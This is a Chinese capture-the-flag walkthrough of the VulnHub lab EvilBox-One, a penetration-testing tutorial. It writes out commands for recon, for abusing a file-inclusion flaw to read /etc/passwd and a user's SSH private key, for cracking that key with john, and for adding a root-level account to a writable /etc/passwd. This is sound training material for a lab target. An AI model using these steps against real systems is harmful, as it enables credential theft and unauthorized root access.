EvilBox-One靶机渗透
字数 1086 2025-08-12 12:08:15

EvilBox-One 靶机渗透教学文档

1. 靶机概述

  • 下载地址: VulnHub EvilBox-One
  • 难度: 简单
  • 推荐环境: VirtualBox (比VMware兼容性更好)
  • 靶机IP: 10.8.1.119 (实际环境中可能不同)

2. 信息收集

2.1 端口扫描

使用nmap进行端口扫描:

nmap -sV -p- 10.8.1.119

发现开放端口:

  • 22 (SSH)
  • 25 (SMTP)
  • 80 (HTTP)
  • 110 (POP3)

2.2 目录扫描

  1. 检查/robots.txt发现提示:

    • Hello
    • H4x0r
      (这些信息后续可能有用)
  2. 访问/secret目录显示空白页面

  3. 使用gobuster进行目录扫描:

    gobuster dir -u http://10.8.1.119/secret -w /usr/share/wordlists/dirb/common.txt
    

    发现evil.php文件

3. 漏洞利用

3.1 参数爆破

  1. 访问/secret/evil.php显示空白页面,推测需要参数

  2. 使用wfuzz进行参数爆破:

    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 0 "http://10.8.1.119/secret/evil.php?FUZZ=/etc/passwd"
    

    发现有效参数command

  3. 测试文件包含漏洞:

    http://10.8.1.119/secret/evil.php?command=/etc/passwd
    

    成功读取/etc/passwd,发现用户mowree

3.2 SSH私钥获取与破解

  1. 通过文件包含漏洞读取用户私钥:

    http://10.8.1.119/secret/evil.php?command=/home/mowree/.ssh/id_rsa
    
  2. 保存私钥为id_rsa并设置权限:

    chmod 600 id_rsa
    
  3. 使用ssh2john转换私钥:

    ssh2john id_rsa > pass.txt
    
  4. 使用john破解密码:

    john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
    

    得到密码unicorn

  5. 使用私钥登录SSH:

    ssh -i id_rsa mowree@10.8.1.119
    

    输入密码unicorn成功获取shell

  6. 查看用户flag:

    cat user.txt
    

4. 权限提升

4.1 检查/etc/passwd权限

  1. 检查/etc/passwd文件权限:
    ls -l /etc/passwd
    
    发现可写权限

4.2 添加特权用户

  1. 生成加密密码:

    perl -le 'print crypt("test","test")'
    

    输出: teH0wLIpW0gyQ

  2. 添加root权限用户:

    echo "toor:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" >> /etc/passwd
    
  3. 验证添加:

    cat /etc/passwd | grep toor
    
  4. 切换用户:

    su toor
    

    输入密码test获取root权限

  5. 查看root flag:

    cat /root/root.txt
    

    得到flag: 36QtXfdJWvdC0VavlPIApUbDlqTsBM!

5. 总结与经验

  1. 常见提权方法检查顺序:

    • sudo -l 检查sudo权限
    • 检查.bash_history历史命令
    • 检查/etc/passwd权限
    • 检查系统版本信息
    • 查找隐藏文件和目录
  2. 文件包含漏洞利用:

    • 尝试读取常见敏感文件(/etc/passwd, /etc/shadow, 用户目录文件等)
    • 注意参数爆破的重要性
  3. SSH私钥利用:

    • 私钥权限必须为600
    • 使用ssh2john和john工具组合破解
  4. 密码生成技巧:

    • 使用perl的crypt函数生成加密密码
    • 格式: perl -le 'print crypt("密码","盐值")'
  5. 靶机渗透流程:
    信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 获取flag

EvilBox-One 靶机渗透教学文档 1. 靶机概述 下载地址 : VulnHub EvilBox-One 难度 : 简单 推荐环境 : VirtualBox (比VMware兼容性更好) 靶机IP : 10.8.1.119 (实际环境中可能不同) 2. 信息收集 2.1 端口扫描 使用nmap进行端口扫描: 发现开放端口: 22 (SSH) 25 (SMTP) 80 (HTTP) 110 (POP3) 2.2 目录扫描 检查 /robots.txt 发现提示: Hello H4x0r (这些信息后续可能有用) 访问 /secret 目录显示空白页面 使用gobuster进行目录扫描: 发现 evil.php 文件 3. 漏洞利用 3.1 参数爆破 访问 /secret/evil.php 显示空白页面,推测需要参数 使用wfuzz进行参数爆破: 发现有效参数 command 测试文件包含漏洞: 成功读取 /etc/passwd ,发现用户 mowree 3.2 SSH私钥获取与破解 通过文件包含漏洞读取用户私钥: 保存私钥为 id_rsa 并设置权限: 使用ssh2john转换私钥: 使用john破解密码: 得到密码 unicorn 使用私钥登录SSH: 输入密码 unicorn 成功获取shell 查看用户flag: 4. 权限提升 4.1 检查/etc/passwd权限 检查 /etc/passwd 文件权限: 发现可写权限 4.2 添加特权用户 生成加密密码: 输出: teH0wLIpW0gyQ 添加root权限用户: 验证添加: 切换用户: 输入密码 test 获取root权限 查看root flag: 得到flag: 36QtXfdJWvdC0VavlPIApUbDlqTsBM! 5. 总结与经验 常见提权方法检查顺序 : sudo -l 检查sudo权限 检查 .bash_history 历史命令 检查 /etc/passwd 权限 检查系统版本信息 查找隐藏文件和目录 文件包含漏洞利用 : 尝试读取常见敏感文件(/etc/passwd, /etc/shadow, 用户目录文件等) 注意参数爆破的重要性 SSH私钥利用 : 私钥权限必须为600 使用ssh2john和john工具组合破解 密码生成技巧 : 使用perl的crypt函数生成加密密码 格式: perl -le 'print crypt("密码","盐值")' 靶机渗透流程 : 信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 获取flag